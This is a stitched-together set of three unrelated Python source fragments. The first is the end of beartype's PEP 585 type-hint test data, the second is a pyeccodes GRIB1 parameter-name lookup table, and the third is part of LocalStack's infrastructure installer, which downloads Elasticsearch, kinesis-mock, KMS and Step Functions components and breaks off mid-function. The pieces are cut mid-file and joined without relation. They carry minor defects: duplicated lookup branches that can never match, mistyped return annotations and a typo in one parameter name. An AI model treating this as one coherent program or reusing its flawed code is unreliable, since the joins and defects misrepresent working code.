return iter(self._sequence)
def __len__(self) -> bool:
return len(self._sequence)
def __reversed__(self) -> object:
return self._sequence.reverse()
class Pep585GenericTypevaredShallowMultiple(Iterable[T], Container[T]):
'''
:pep:`585`-compliant user-defined generic subclassing multiple directly
parametrized :mod:`collections.abc` abstract base classes (ABCs).
'''
# ................{ INITIALIZERS }................
def __init__(self, iterable: tuple) -> None:
'''
Initialize this generic from the passed tuple.
'''
assert isinstance(iterable, tuple), f'{repr(iterable)} not tuple.'
self._iterable = iterable
# ................{ ABCs }................
# Define all protocols mandated by ABCs subclassed by this generic.
def __contains__(self, obj: object) -> bool:
return obj in self._iterable
def __iter__(self) -> bool:
return iter(self._iterable)
class Pep585GenericTypevaredDeepMultiple(
Sized, Iterable[tuple[S, T]], Container[tuple[S, T]]):
'''
:pep:`585`-compliant user-defined generic subclassing multiple
indirectly parametrized (but unsubscripted) :mod:`collections.abc`
abstract base classes (ABCs) *and* an unsubscripted and unparametrized
:mod:`collections.abc` ABC.
'''
# ................{ INITIALIZERS }................
def __init__(self, iterable: tuple) -> None:
'''
Initialize this generic from the passed tuple.
'''
assert isinstance(iterable, tuple), f'{repr(iterable)} not tuple.'
self._iterable = iterable
# ................{ ABCs }................
# Define all protocols mandated by ABCs subclassed by this generic.
def __contains__(self, obj: object) -> bool:
return obj in self._iterable
def __iter__(self) -> bool:
return iter(self._iterable)
def __len__(self) -> bool:
return len(self._iterable)
# ..................{ PRIVATE ~ forwardref }..................
_TEST_PEP585_FORWARDREF_CLASSNAME = (
'beartype_test.a00_unit.data.data_type.Subclass')
'''
Fully-qualified classname of an arbitrary class guaranteed to be
importable.
'''
_TEST_PEP585_FORWARDREF_TYPE = Subclass
'''
Arbitrary class referred to by :data:`_PEP484_FORWARDREF_CLASSNAME`.
'''
# ..................{ MAPPINGS }..................
# Add PEP 585-specific test type hints to this dictionary global.
data_module.HINTS_PEP_META.extend((
# ................{ BYTESTRING }................
# Byte string of integer constants satisfying the builtin "int" type.
#
# Note that *ALL* byte strings necessarily contain only integer
# constants, regardless of whether those byte strings are instantiated
# as "bytes" or "bytearray" instances. Ergo, subscripting
# "collections.abc.ByteString" by any class other than those satisfying
# the standard integer protocol raises a runtime error from @beartype.
# Yes, this means that subscripting "collections.abc.ByteString"
# conveys no information and is thus nonsensical. Welcome to PEP 585.
HintPepMetadata(
hint=ByteString[int],
pep_sign=HintSignByteString,
isinstanceable_type=ByteString,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Byte string constant.
HintPithSatisfiedMetadata(b'Ingratiatingly'),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('For an Ǽeons’ æon.'),
),
),
# Byte string of integer constants satisfying the stdlib
# "numbers.Integral" protocol.
HintPepMetadata(
hint=ByteString[IntType],
pep_sign=HintSignByteString,
isinstanceable_type=ByteString,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Byte array initialized from a byte string constant.
HintPithSatisfiedMetadata(bytearray(b'Cutting Wit')),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'Of birch‐rut, smut‐smitten papers and'),
),
),
# ................{ CALLABLE }................
# Callable accepting no parameters and returning a string.
HintPepMetadata(
hint=Callable[[], str],
pep_sign=HintSignCallable,
isinstanceable_type=Callable,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Lambda function returning a string constant.
HintPithSatisfiedMetadata(lambda: 'Eudaemonia.'),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('...grant we heal'),
),
),
# ................{ CONTEXTMANAGER }................
# Context manager yielding strings.
HintPepMetadata(
hint=AbstractContextManager[str],
pep_sign=HintSignContextManager,
isinstanceable_type=AbstractContextManager,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Context manager.
HintPithSatisfiedMetadata(
pith=lambda: context_manager_factory(
'We were mysteries, unwon'),
is_context_manager=True,
is_pith_factory=True,
),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('We donned apportionments'),
),
),
# ................{ DICT }................
# Flat dictionary.
HintPepMetadata(
hint=dict[int, str],
pep_sign=HintSignDict,
isinstanceable_type=dict,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Dictionary mapping integer keys to string values.
HintPithSatisfiedMetadata({
1: 'For taxing',
2: "To a lax and golden‐rendered crucifixion, affix'd",
}),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'To that beep‐prattling, LED‐ and lead-rattling crux'),
),
),
# Generic dictionary.
HintPepMetadata(
hint=dict[S, T],
pep_sign=HintSignDict,
isinstanceable_type=dict,
is_typevars=True,
is_pep585_builtin=True,
piths_satisfied_meta=(
# Dictionary mapping string keys to integer values.
HintPithSatisfiedMetadata({
'Less-ons"-chastened': 2,
'Chanson': 1,
}),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('Swansong.'),
),
),
# ................{ GENERATOR }................
# Note that testing generators requires creating generators, which
# require a different syntax to that of standard callables; ergo,
# generator type hints are tested elsewhere.
# ................{ GENERICS ~ single }................
# Note that PEP 585-compliant generics are *NOT* explicitly detected as
# PEP 585-compliant due to idiosyncrasies in the CPython implementation
# of these generics. Ergo, we intentionally do *NOT* set
# "is_pep585_builtin=True," below.
# Generic subclassing a single unparametrized builtin container.
HintPepMetadata(
hint=Pep585GenericUntypevaredSingle,
pep_sign=HintSignGeneric,
generic_type=Pep585GenericUntypevaredSingle,
is_pep585_generic=True,
is_args=False,
piths_satisfied_meta=(
# Subclass-specific generic list of string constants.
HintPithSatisfiedMetadata(Pep585GenericUntypevaredSingle((
'Forgive our Vocation’s vociferous publications',
'Of',
))),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'Hourly sybaritical, pub sabbaticals'),
# List of string constants.
HintPithUnsatisfiedMetadata([
'Materially ostracizing, itinerant‐',
'Anchoretic digimonks initiating',
]),
),
),
# Generic subclassing a single parametrized builtin containerr.
HintPepMetadata(
hint=Pep585GenericTypevaredSingle,
pep_sign=HintSignGeneric,
generic_type=Pep585GenericTypevaredSingle,
is_pep585_generic=True,
is_typevars=True,
piths_satisfied_meta=(
# Subclass-specific generic list of string constants.
HintPithSatisfiedMetadata(Pep585GenericTypevaredSingle((
'Pleasurable, Raucous caucuses',
'Within th-in cannon’s cynosure-ensuring refectories',
))),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'We there-in leather-sutured scriptured books'),
# List of string constants.
HintPithUnsatisfiedMetadata([
'We laboriously let them boringly refactor',
'Of Meme‐hacked faith’s abandonment, retroactively',
]),
),
),
# Generic subclassing a single parametrized builtin container, itself
# parametrized by the same type variables in the same order.
HintPepMetadata(
hint=Pep585GenericTypevaredSingle[S, T],
pep_sign=HintSignGeneric,
generic_type=Pep585GenericTypevaredSingle,
is_pep585_generic=True,
is_typevars=True,
piths_satisfied_meta=(
# Subclass-specific generic list of string constants.
HintPithSatisfiedMetadata(Pep585GenericTypevaredSingle((
'Bandage‐managed',
'Into Faithless redaction’s didact enactment — crookedly',
))),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata(
'Down‐bound'),
# List of string constants.
HintPithUnsatisfiedMetadata([
'To prayer',
'To Ɯṙaith‐like‐upwreathed ligaments',
]),
),
),
# ................{ GENERICS ~ multiple }................
# Generic subclassing multiple unparametrized "collection.abc" abstract
# base class (ABCs) *AND* an unsubscripted "collection.abc" ABC.
HintPepMetadata(
hint=Pep585GenericUntypevaredMultiple,
pep_sign=HintSignGeneric,
generic_type=Pep585GenericUntypevaredMultiple,
is_pep585_generic=True,
is_args=False,
piths_satisfied_meta=(
# Subclass-specific generic 2-tuple of string constants.
HintPithSatisfiedMetadata(Pep585GenericUntypevaredMultiple((
'Into a viscerally Eviscerated eras’ meditative hallways',
'Interrupting Soul‐viscous, vile‐ly Viceroy‐insufflating',
))),
),
piths_unsatisfied_meta=(
# String constant.
HintPithUnsatisfiedMetadata('Initiations'),
# 2-tuple of string constants.
HintPithUnsatisfiedMetadata((
"Into a fat mendicant’s",
'Endgame‐defendant, dedicate rants',
)),
),
),
# Generic subclassing multiple parametrized "collections.abc" abstract
# base classes (ABCs).
HintPepMetadata(
hint=Pep585GenericTypevaredShallowMultiple,
pep_sign=HintSignGeneric,
generic_type=Pep585GenericTypevaredShallowMultiple,
is_pep585_generic=True,
| |
<filename>pyeccodes/defs/grib1/localConcepts/efkl/name_def.py
import pyeccodes.accessors as _
def load(h):
def wrapped(h):
table2Version = h.get_l('table2Version')
indicatorOfParameter = h.get_l('indicatorOfParameter')
if table2Version == 253 and indicatorOfParameter == 228:
return 'Instantaneous Wind Speed in m/s'
if table2Version == 253 and indicatorOfParameter == 210:
return 'Clutter corrected ceflectivity'
if table2Version == 253 and indicatorOfParameter == 209:
return 'Multiplicity Of The Flash, Number'
if table2Version == 253 and indicatorOfParameter == 204:
return 'Total hail precipitation in kg/m2'
if table2Version == 253 and indicatorOfParameter == 201:
return 'Instant graupel in kg/m2'
if table2Version == 253 and indicatorOfParameter == 201:
return 'Graupel precipitation in kg/m2'
if table2Version == 253 and indicatorOfParameter == 200:
return 'Kinetic energy of turbulence in J kg-1'
if table2Version == 253 and indicatorOfParameter == 187:
return 'Height of cloud top'
if table2Version == 253 and indicatorOfParameter == 186:
return 'Cloud base height'
if table2Version == 253 and indicatorOfParameter == 185:
return 'Solid precipitation (f.ex. snow+graupel)'
if table2Version == 253 and indicatorOfParameter == 184:
return 'Instant snowfall rate in mm/s or mm/h'
if table2Version == 253 and indicatorOfParameter == 184:
return 'Snowfall accumulation in mm'
if table2Version == 253 and indicatorOfParameter == 181:
return 'Instant rain in kg/m2'
if table2Version == 253 and indicatorOfParameter == 163:
return 'V-component of wind gust'
if table2Version == 253 and indicatorOfParameter == 162:
return 'U-component of wind gust'
if table2Version == 253 and indicatorOfParameter == 160:
return 'Convective available potential energy'
if table2Version == 253 and indicatorOfParameter == 144:
return 'Precipitation type'
if table2Version == 253 and indicatorOfParameter == 135:
return 'Icing warning index, values between 0 ... 4'
if table2Version == 253 and indicatorOfParameter == 125:
return 'V-component of momentum flux in N m-2'
if table2Version == 253 and indicatorOfParameter == 124:
return 'U-component of momentum flux in N m-2'
if table2Version == 253 and indicatorOfParameter == 122:
return 'Sensible heat flux'
if table2Version == 253 and indicatorOfParameter == 121:
return 'Latent heat flux'
if table2Version == 253 and indicatorOfParameter == 117:
return 'Global radiation accumulation'
if table2Version == 253 and indicatorOfParameter == 115:
return 'Long wave radiation accumulation'
if table2Version == 253 and indicatorOfParameter == 114:
return 'Net long wave radiation accumulation, top of atmosphere'
if table2Version == 253 and indicatorOfParameter == 114:
return 'Net long wave radiation, top of athmosphere'
if table2Version == 253 and indicatorOfParameter == 113:
return 'Net short wave radiation accumulation, top of atmosphere'
if table2Version == 253 and indicatorOfParameter == 113:
return 'Net short wave radiation, top of athmosphere'
if table2Version == 253 and indicatorOfParameter == 112:
return 'Net long wave radiation accumulation'
if table2Version == 253 and indicatorOfParameter == 111:
return 'Net short wave radiation accumulation'
if table2Version == 253 and indicatorOfParameter == 103:
return 'Peak wave period in s'
if table2Version == 253 and indicatorOfParameter == 102:
return 'Significant wave height in m'
if table2Version == 253 and indicatorOfParameter == 101:
return 'Mean wave direction at spectral peak in degrees'
if table2Version == 253 and indicatorOfParameter == 91:
return 'Ice Cover, 1=ice, 0=no ice'
if table2Version == 253 and indicatorOfParameter == 86:
return 'Soil Moisture Content in Kg per square meter'
if table2Version == 253 and indicatorOfParameter == 84:
return 'ALBEDO 0 to 1'
if table2Version == 253 and indicatorOfParameter == 83:
return 'Surface Roughness in Meters'
if table2Version == 253 and indicatorOfParameter == 81:
return 'Land Cover, 1=land, 0=sea'
if table2Version == 253 and indicatorOfParameter == 76:
return 'Cloud water'
if table2Version == 253 and indicatorOfParameter == 75:
return 'High Cloud Amount'
if table2Version == 253 and indicatorOfParameter == 74:
return 'Medium Cloud Amount'
if table2Version == 253 and indicatorOfParameter == 73:
return 'Low Cloud Amount'
if table2Version == 253 and indicatorOfParameter == 71:
return 'Cloudiness 0...1'
if table2Version == 253 and indicatorOfParameter == 67:
return 'Mixed layer height in m'
if table2Version == 253 and indicatorOfParameter == 66:
return 'Snow Depth in Meters'
if table2Version == 253 and indicatorOfParameter == 61:
return 'Total precipitation in kg/m2'
if table2Version == 253 and indicatorOfParameter == 58:
return 'Cloud ice'
if table2Version == 253 and indicatorOfParameter == 57:
return 'Evaporation in mm'
if table2Version == 253 and indicatorOfParameter == 54:
return 'Precipitable water in mm'
if table2Version == 253 and indicatorOfParameter == 52:
return 'Relative Humidity in percents'
if table2Version == 253 and indicatorOfParameter == 51:
return 'Specific Humidity in kg/kg'
if table2Version == 253 and indicatorOfParameter == 41:
return 'Absolute Vorticity in HZ'
if table2Version == 253 and indicatorOfParameter == 40:
return 'Vertical Velocity in m/s'
if table2Version == 253 and indicatorOfParameter == 39:
return 'Vertical Velocity in pa/s'
if table2Version == 253 and indicatorOfParameter == 34:
return 'V wind in m/s'
if table2Version == 253 and indicatorOfParameter == 33:
return 'U wind in m/s'
if table2Version == 253 and indicatorOfParameter == 20:
return 'Visibility in Meters'
if table2Version == 253 and indicatorOfParameter == 17:
return 'Dew point Temperature in K'
if table2Version == 253 and indicatorOfParameter == 16:
return 'Minimum Temperature in Celsius'
if table2Version == 253 and indicatorOfParameter == 15:
return 'Maximum Temperature in Celsius'
if table2Version == 253 and indicatorOfParameter == 13:
return 'Potential temperature'
if table2Version == 253 and indicatorOfParameter == 11:
return 'Temperature in Kelvins'
if table2Version == 253 and indicatorOfParameter == 8:
return 'Height of level in meters'
if table2Version == 253 and indicatorOfParameter == 6:
return 'Geopotential'
if table2Version == 253 and indicatorOfParameter == 2:
return 'Pressure in Pascals'
if table2Version == 253 and indicatorOfParameter == 1:
return 'Pressure in Pascals'
if table2Version == 205 and indicatorOfParameter == 14:
return 'Ice speed in m/s'
if table2Version == 205 and indicatorOfParameter == 13:
return 'Ice Direction in Degrees'
if table2Version == 205 and indicatorOfParameter == 12:
return 'Rafted sea ice concentration'
if table2Version == 205 and indicatorOfParameter == 11:
return 'Rafted sea ice mean thickness'
if table2Version == 205 and indicatorOfParameter == 10:
return 'Ice concentration of ridging'
if table2Version == 205 and indicatorOfParameter == 9:
return 'Ice mean thickness'
if table2Version == 205 and indicatorOfParameter == 8:
return 'Sea ice velocity (V) in m/s'
if table2Version == 205 and indicatorOfParameter == 7:
return 'Sea ice velocity (U) in m/s'
if table2Version == 205 and indicatorOfParameter == 6:
return 'Ice degree of ridging'
if table2Version == 205 and indicatorOfParameter == 5:
return 'Ice maximum thickness'
if table2Version == 205 and indicatorOfParameter == 4:
return 'Ice minimum thickness'
if table2Version == 205 and indicatorOfParameter == 3:
return 'Ice thickness'
if table2Version == 205 and indicatorOfParameter == 2:
return 'Ice concentration'
if table2Version == 205 and indicatorOfParameter == 1:
return 'Sea Temperature in Celsius'
if table2Version == 203 and indicatorOfParameter == 255:
return 'Precipitation form, duplicate parameter for HIMAN purposes'
if table2Version == 203 and indicatorOfParameter == 254:
return 'Convective inhibition, source data is LFC-500 and EL-500'
if table2Version == 203 and indicatorOfParameter == 253:
return 'CAPE, source data is LFC-500 and EL-500, value of CAPE when -40C < T < -10C'
if table2Version == 203 and indicatorOfParameter == 252:
return 'CAPE, source data is LFC-500 and EL-500, value of CAPE between 0 .. 3km'
if table2Version == 203 and indicatorOfParameter == 251:
return 'Convective available potential energy, value of CAPE between 0 .. 3km'
if table2Version == 203 and indicatorOfParameter == 250:
return 'Height of EL in meters, source data is averaged between 0 .. 500m'
if table2Version == 203 and indicatorOfParameter == 249:
return 'Height of LFC in meters, source data is averaged between 0 .. 500m'
if table2Version == 203 and indicatorOfParameter == 248:
return 'Height of LCL in meters, source data is averaged between 0 .. 500m'
if table2Version == 203 and indicatorOfParameter == 247:
return 'Height of EL in hPa, source data is averaged between 0 .. 500m'
if table2Version == 203 and indicatorOfParameter == 246:
return 'Height of LFC in hPa, source data is | |
<gh_stars>0
#!/usr/bin/env python
import glob
import logging
import os
import platform
import re
import shutil
import stat
import sys
import tempfile
import time
from pathlib import Path
import requests
from localstack import config
from localstack.config import is_env_true
from localstack.constants import (
DEFAULT_SERVICE_PORTS,
DYNAMODB_JAR_URL,
ELASTICMQ_JAR_URL,
ELASTICSEARCH_DEFAULT_VERSION,
ELASTICSEARCH_DELETE_MODULES,
ELASTICSEARCH_PLUGIN_LIST,
INSTALL_DIR_INFRA,
KMS_URL_PATTERN,
LOCALSTACK_INFRA_PROCESS,
LOCALSTACK_MAVEN_VERSION,
MODULE_MAIN_PATH,
STS_JAR_URL,
)
from localstack.utils import bootstrap
from localstack.utils.common import (
chmod_r,
download,
get_arch,
get_os,
is_windows,
load_file,
mkdir,
new_tmp_file,
parallelize,
retry,
rm_rf,
run,
safe_run,
save_file,
untar,
unzip,
)
from localstack.utils.docker_utils import DOCKER_CLIENT
# Module-level logger for installer progress/diagnostics.
LOG = logging.getLogger(__name__)
# ---- installation target directories (under the infra / node_modules roots) ----
INSTALL_DIR_NPM = "%s/node_modules" % MODULE_MAIN_PATH
INSTALL_DIR_DDB = "%s/dynamodb" % INSTALL_DIR_INFRA
INSTALL_DIR_KCL = "%s/amazon-kinesis-client" % INSTALL_DIR_INFRA
INSTALL_DIR_STEPFUNCTIONS = "%s/stepfunctions" % INSTALL_DIR_INFRA
INSTALL_DIR_KMS = "%s/kms" % INSTALL_DIR_INFRA
INSTALL_DIR_ELASTICMQ = "%s/elasticmq" % INSTALL_DIR_INFRA
# ---- concrete artifact paths inside those directories ----
INSTALL_PATH_LOCALSTACK_FAT_JAR = "%s/localstack-utils-fat.jar" % INSTALL_DIR_INFRA
INSTALL_PATH_DDB_JAR = os.path.join(INSTALL_DIR_DDB, "DynamoDBLocal.jar")
INSTALL_PATH_KCL_JAR = os.path.join(INSTALL_DIR_KCL, "aws-java-sdk-sts.jar")
INSTALL_PATH_STEPFUNCTIONS_JAR = os.path.join(INSTALL_DIR_STEPFUNCTIONS, "StepFunctionsLocal.jar")
# "<arch>" placeholder is substituted at install time (see install_local_kms).
INSTALL_PATH_KMS_BINARY_PATTERN = os.path.join(INSTALL_DIR_KMS, "local-kms.<arch>.bin")
INSTALL_PATH_ELASTICMQ_JAR = os.path.join(INSTALL_DIR_ELASTICMQ, "elasticmq-server.jar")
INSTALL_PATH_KINESALITE_CLI = os.path.join(INSTALL_DIR_NPM, "kinesalite", "cli.js")
INSTALL_PATH_KINESIS_MOCK = os.path.join(INSTALL_DIR_INFRA, "kinesis-mock")
URL_LOCALSTACK_FAT_JAR = (
    "https://repo1.maven.org/maven2/"
    + "cloud/localstack/localstack-utils/{v}/localstack-utils-{v}-fat.jar"
).format(v=LOCALSTACK_MAVEN_VERSION)
# Presence of this marker file indicates a "light" build (see get_elasticsearch_install_dir).
MARKER_FILE_LIGHT_VERSION = "%s/.light-version" % INSTALL_DIR_INFRA
IMAGE_NAME_SFN_LOCAL = "amazon/aws-stepfunctions-local"
ARTIFACTS_REPO = "https://github.com/localstack/localstack-artifacts"
# Patched Step Functions Local class files, fetched from the artifacts repo and
# zipped into the local JAR (see install_stepfunctions_local).
SFN_PATCH_CLASS1 = "com/amazonaws/stepfunctions/local/runtime/Config.class"
SFN_PATCH_CLASS2 = (
    "com/amazonaws/stepfunctions/local/runtime/executors/task/LambdaTaskStateExecutor.class"
)
SFN_PATCH_CLASS_URL1 = "%s/raw/master/stepfunctions-local-patch/%s" % (
    ARTIFACTS_REPO,
    SFN_PATCH_CLASS1,
)
SFN_PATCH_CLASS_URL2 = "%s/raw/master/stepfunctions-local-patch/%s" % (
    ARTIFACTS_REPO,
    SFN_PATCH_CLASS2,
)
# kinesis-mock version
KINESIS_MOCK_VERSION = os.environ.get("KINESIS_MOCK_VERSION") or "0.2.0"
KINESIS_MOCK_RELEASE_URL = (
    "https://api.github.com/repos/etspaceman/kinesis-mock/releases/tags/" + KINESIS_MOCK_VERSION
)
# debugpy module
DEBUGPY_MODULE = "debugpy"
DEBUGPY_DEPENDENCIES = ["gcc", "python3-dev", "musl-dev"]
# Target version for javac, to ensure compatibility with earlier JREs
JAVAC_TARGET_VERSION = "1.8"
# SQS backend implementation provider - either "moto" or "elasticmq"
SQS_BACKEND_IMPL = os.environ.get("SQS_PROVIDER") or "moto"
# GO Lambda runtime
GO_RUNTIME_VERSION = "0.4.0"
# NOTE(review): "awslamba" (sic) matches the upstream repository name - do not "fix" the URL.
GO_RUNTIME_DOWNLOAD_URL_TEMPLATE = "https://github.com/localstack/awslamba-go-runtime/releases/download/v{version}/awslamba-go-runtime-{version}-{os}-{arch}.tar.gz"
GO_INSTALL_FOLDER = os.path.join(config.TMP_FOLDER, "awslamba-go-runtime")
GO_LAMBDA_RUNTIME = os.path.join(GO_INSTALL_FOLDER, "aws-lambda-mock")
GO_LAMBDA_MOCKSERVER = os.path.join(GO_INSTALL_FOLDER, "mockserver")
# Terraform (used for tests, whose templates require TF < 0.14.0 )
TERRAFORM_VERSION = "0.13.7"
TERRAFORM_URL_TEMPLATE = (
    "https://releases.hashicorp.com/terraform/{version}/terraform_{version}_{os}_{arch}.zip"
)
TERRAFORM_BIN = os.path.join(INSTALL_DIR_INFRA, f"terraform-{TERRAFORM_VERSION}", "terraform")
def get_elasticsearch_install_version(version: str) -> str:
    """Resolve the Elasticsearch version that should actually be installed."""
    from localstack.services.es import versions
    if not config.SKIP_INFRA_DOWNLOADS:
        return versions.get_install_version(version)
    # downloads disabled -> stick to the bundled default version
    return ELASTICSEARCH_DEFAULT_VERSION
def get_elasticsearch_install_dir(version: str) -> str:
    """Return the directory a given Elasticsearch version is installed into."""
    resolved_version = get_elasticsearch_install_version(version)
    is_default_full_install = (
        resolved_version == ELASTICSEARCH_DEFAULT_VERSION
        and not os.path.exists(MARKER_FILE_LIGHT_VERSION)
    )
    if is_default_full_install:
        # the default version lives in a subfolder of the code base
        return os.path.join(INSTALL_DIR_INFRA, "elasticsearch")
    # every other version goes into the TMP_FOLDER
    return os.path.join(config.TMP_FOLDER, "elasticsearch", resolved_version)
def install_elasticsearch(version=None):
    """Download, extract and post-process an Elasticsearch distribution.

    Installs the requested version (default: ELASTICSEARCH_DEFAULT_VERSION) if its
    "bin/elasticsearch" executable is not yet present, installs the default plugins,
    then (on every call) removes unneeded modules and comments out hardcoded JVM
    heap settings.
    """
    from localstack.services.es import versions
    if not version:
        version = ELASTICSEARCH_DEFAULT_VERSION
    version = get_elasticsearch_install_version(version)
    install_dir = get_elasticsearch_install_dir(version)
    installed_executable = os.path.join(install_dir, "bin", "elasticsearch")
    if not os.path.exists(installed_executable):
        log_install_msg("Elasticsearch (%s)" % version)
        es_url = versions.get_download_url(version)
        install_dir_parent = os.path.dirname(install_dir)
        mkdir(install_dir_parent)
        # download and extract archive
        tmp_archive = os.path.join(config.TMP_FOLDER, "localstack.%s" % os.path.basename(es_url))
        download_and_extract_with_retry(es_url, tmp_archive, install_dir_parent)
        # the archive extracts to a versioned folder name -> locate and rename it
        elasticsearch_dir = glob.glob(os.path.join(install_dir_parent, "elasticsearch*"))
        if not elasticsearch_dir:
            raise Exception("Unable to find Elasticsearch folder in %s" % install_dir_parent)
        shutil.move(elasticsearch_dir[0], install_dir)
        # pre-create runtime directories with permissive access rights
        for dir_name in ("data", "logs", "modules", "plugins", "config/scripts"):
            dir_path = os.path.join(install_dir, dir_name)
            mkdir(dir_path)
            chmod_r(dir_path, 0o777)
        # install default plugins
        for plugin in ELASTICSEARCH_PLUGIN_LIST:
            plugin_binary = os.path.join(install_dir, "bin", "elasticsearch-plugin")
            plugin_dir = os.path.join(install_dir, "plugins", plugin)
            if not os.path.exists(plugin_dir):
                LOG.info("Installing Elasticsearch plugin %s" % plugin)
                def try_install():
                    safe_run([plugin_binary, "install", "-b", plugin])
                # We're occasionally seeing javax.net.ssl.SSLHandshakeException -> add download retries
                download_attempts = 3
                try:
                    retry(try_install, retries=download_attempts - 1, sleep=2)
                except Exception:
                    LOG.warning(
                        "Unable to download Elasticsearch plugin '%s' after %s attempts",
                        plugin,
                        download_attempts,
                    )
                    # plugin failures abort the install unless explicitly ignored via env var
                    if not os.environ.get("IGNORE_ES_DOWNLOAD_ERRORS"):
                        raise
    # delete some plugins to free up space
    for plugin in ELASTICSEARCH_DELETE_MODULES:
        module_dir = os.path.join(install_dir, "modules", plugin)
        rm_rf(module_dir)
    # disable x-pack-ml plugin (not working on Alpine)
    xpack_dir = os.path.join(install_dir, "modules", "x-pack-ml", "platform")
    rm_rf(xpack_dir)
    # patch JVM options file - replace hardcoded heap size settings
    jvm_options_file = os.path.join(install_dir, "config", "jvm.options")
    if os.path.exists(jvm_options_file):
        jvm_options = load_file(jvm_options_file)
        # comment out any -Xms/-Xmx lines so heap size can be set externally
        jvm_options_replaced = re.sub(
            r"(^-Xm[sx][a-zA-Z0-9\.]+$)", r"# \1", jvm_options, flags=re.MULTILINE
        )
        if jvm_options != jvm_options_replaced:
            save_file(jvm_options_file, jvm_options_replaced)
def install_elasticmq():
    """Download the ElasticMQ server JAR if ElasticMQ is the configured SQS backend."""
    # TODO remove this function if we stop using ElasticMQ entirely
    if SQS_BACKEND_IMPL != "elasticmq":
        return
    if os.path.exists(INSTALL_PATH_ELASTICMQ_JAR):
        return
    log_install_msg("ElasticMQ")
    mkdir(INSTALL_DIR_ELASTICMQ)
    # cache the downloaded archive in the temp folder, then copy it into place
    cached_jar = os.path.join(config.TMP_FOLDER, "elasticmq-server.jar")
    if not os.path.exists(cached_jar):
        download(ELASTICMQ_JAR_URL, cached_jar)
    shutil.copy(cached_jar, INSTALL_DIR_ELASTICMQ)
def install_kinesis():
    """Install the Kinesis provider selected via config.KINESIS_PROVIDER."""
    provider = config.KINESIS_PROVIDER
    installer = {
        "kinesalite": install_kinesalite,
        "kinesis-mock": install_kinesis_mock,
    }.get(provider)
    if installer is None:
        raise ValueError("unknown kinesis provider %s" % provider)
    return installer()
def install_kinesalite():
    """Install the kinesalite CLI via npm unless it is already present."""
    if os.path.exists(INSTALL_PATH_KINESALITE_CLI):
        return
    log_install_msg("Kinesis")
    run('cd "%s" && npm install' % MODULE_MAIN_PATH)
def install_kinesis_mock():
    """Download the kinesis-mock binary matching the current platform.

    Picks a static/dynamic native binary for amd64 Windows/Linux/macOS and falls
    back to the JAR everywhere else (or when KINESIS_MOCK_FORCE_JAVA is set).
    Returns the path to the installed binary.
    """
    target_dir = INSTALL_PATH_KINESIS_MOCK
    machine = platform.machine().lower()
    system = platform.system().lower()
    version = platform.version().lower()
    # NOTE(review): this checks platform.version(), not platform.machine(), to spot
    # Apple Silicon (e.g. x86 Python under Rosetta) - confirm this heuristic still holds
    is_probably_m1 = system == "darwin" and ("arm64" in version or "arm32" in version)
    LOG.debug("getting kinesis-mock for %s %s", system, machine)
    if is_env_true("KINESIS_MOCK_FORCE_JAVA"):
        # sometimes the static binaries may have problems, and we want to fall back to Java
        bin_file = "kinesis-mock.jar"
    elif (machine == "x86_64" or machine == "amd64") and not is_probably_m1:
        if system == "windows":
            bin_file = "kinesis-mock-mostly-static.exe"
        elif system == "linux":
            bin_file = "kinesis-mock-linux-amd64-static"
        elif system == "darwin":
            bin_file = "kinesis-mock-macos-amd64-dynamic"
        else:
            bin_file = "kinesis-mock.jar"
    else:
        bin_file = "kinesis-mock.jar"
    bin_file_path = os.path.join(target_dir, bin_file)
    if os.path.exists(bin_file_path):
        LOG.debug("kinesis-mock found at %s", bin_file_path)
        return bin_file_path
    # query the GitHub release for the download URL of the chosen asset
    response = requests.get(KINESIS_MOCK_RELEASE_URL)
    if not response.ok:
        raise ValueError(
            "Could not get list of releases from %s: %s" % (KINESIS_MOCK_RELEASE_URL, response.text)
        )
    github_release = response.json()
    download_url = None
    for asset in github_release.get("assets", []):
        # find the correct binary in the release
        if asset["name"] == bin_file:
            download_url = asset["browser_download_url"]
            break
    if download_url is None:
        raise ValueError(
            "could not find required binary %s in release %s" % (bin_file, KINESIS_MOCK_RELEASE_URL)
        )
    mkdir(target_dir)
    LOG.info("downloading kinesis-mock binary from %s", download_url)
    download(download_url, bin_file_path)
    chmod_r(bin_file_path, 0o777)
    return bin_file_path
def install_local_kms():
    """Download the local-kms binary for the current OS unless already installed."""
    # NOTE: the "<arch>" placeholder is filled with the OS name returned by get_os()
    os_name = get_os()
    target_binary = INSTALL_PATH_KMS_BINARY_PATTERN.replace("<arch>", os_name)
    if os.path.exists(target_binary):
        return
    log_install_msg("KMS")
    mkdir(INSTALL_DIR_KMS)
    # TODO ARM download platform specific binary
    download(KMS_URL_PATTERN.replace("<arch>", os_name), target_binary)
    chmod_r(target_binary, 0o777)
def install_stepfunctions_local():
    """Install Step Functions Local by extracting its JAR from the Docker image,
    then patch the JAR with fixed class files from the artifacts repo."""
    if not os.path.exists(INSTALL_PATH_STEPFUNCTIONS_JAR):
        # pull the JAR file from the Docker image, which is more up-to-date than the downloadable JAR file
        # TODO: works only when running on the host, outside of Docker -> add a fallback if running in Docker?
        log_install_msg("Step Functions")
        mkdir(INSTALL_DIR_STEPFUNCTIONS)
        DOCKER_CLIENT.pull_image(IMAGE_NAME_SFN_LOCAL)
        docker_name = "tmp-ls-sfn"
        # start a short-lived container just to copy files out of it
        DOCKER_CLIENT.run_container(
            IMAGE_NAME_SFN_LOCAL,
            remove=True,
            entrypoint="",
            name=docker_name,
            detach=True,
            command=["sleep", "15"],
        )
        # give the detached container time to come up before copying from it
        time.sleep(5)
        DOCKER_CLIENT.copy_from_container(
            docker_name, local_path=INSTALL_DIR_INFRA, container_path="/home/stepfunctionslocal/"
        )
